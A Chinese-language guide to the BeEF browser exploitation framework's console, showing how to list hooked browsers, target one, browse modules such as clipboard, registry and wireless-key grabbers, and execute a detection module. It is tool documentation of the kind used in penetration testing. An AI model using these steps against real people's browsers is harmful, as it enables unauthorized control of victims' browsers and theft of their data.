BeEF控制台
介绍
BeEF包括类似metasploit的控制台。该控制台可用于控制挂钩的浏览器和发送模块。
组件
BeEF控制台是应在主要config.yml文件中启用的扩展。
使用率
该控制台将随beef脚本自动启动。
帮助
Core Commands
=============
Command Description
------- -----------
? Help menu
back Move back from the current context
exit Exit the console
help Help menu
irb Drops into an interactive Ruby environment
jobs Print jobs
offline List previously hooked browsers
online List online hooked browsers
quit Exit the console
review Target a particular previously hooked (offline) hooked browser
show Displays 'zombies' or 'browsers' or 'commands'. (For those who prefer the MSF way)
target Target a particular online hooked browser
挂钩的浏览器
BeEF > online
Currently hooked browsers within BeEF
Id IP Browser OS
-- -- ------- --
6 10.1.1.1 C-21 Linux
BeEF > offline
Previously hooked browsers within BeEF
Id IP Browser OS
-- -- ------- --
1 10.1.1.2 FF-15 Windows XP
[...]
Jobs
BeEF > jobs -l
Id Job Name
-- --------
0 http_hook_server
启动模块
选择目标僵尸机:
BeEF > target 6
可用模块 :
BeEF (10.1.1.1) [6] > commands
List command modules for this target
Id Command Status Execute Count
-- ------- ------ -------------
1 Host/Hook_Default_Browser User Notify 0
2 Host/Detect_CUPS Working 0
3 Host/Get_Clipboard Not Working 0
4 Host/Get_Registry_Keys Not Working 0
5 Host/Get_Wireless_Keys User Notify 0
[...]
选择模块:
BeEF (10.1.1.1) [6] > select 66
查看有关模块的信息:
BeEF (10.1.1.1) [6] / Detect Google Desktop > cmdinfo
Module name: Detect Google Desktop
Module category: Host/
Module description: This module attempts to detect Google Desktop running on the default port 4664.
启动模块:
BeEF (10.1.1.1) [6] / Detect Google Desktop > execute
[*] Command successfully queued
[13:21:24][*] Hooked browser [id:6, ip:10.1.1.1] has been sent instructions from command module 'Detect Google Desktop'
查看响应:
BeEF (10.1.1.1) [6] / Detect Google Desktop > response
List of responses for this command module:
Id Executed Time Response Time
-- ------------- -------------
48 2012-10-15 13:18 2012-10-15 13:19:04 +0200
51 2012-10-15 13:21 2012-10-15 13:21:29 +0200
BeEF (10.1.1.1) [6] / Detect Google Desktop > response 51
Results retrieved: 2012-10-15 13:21:29 +0200
Response:
google_desktop=Not Installed
推荐文章: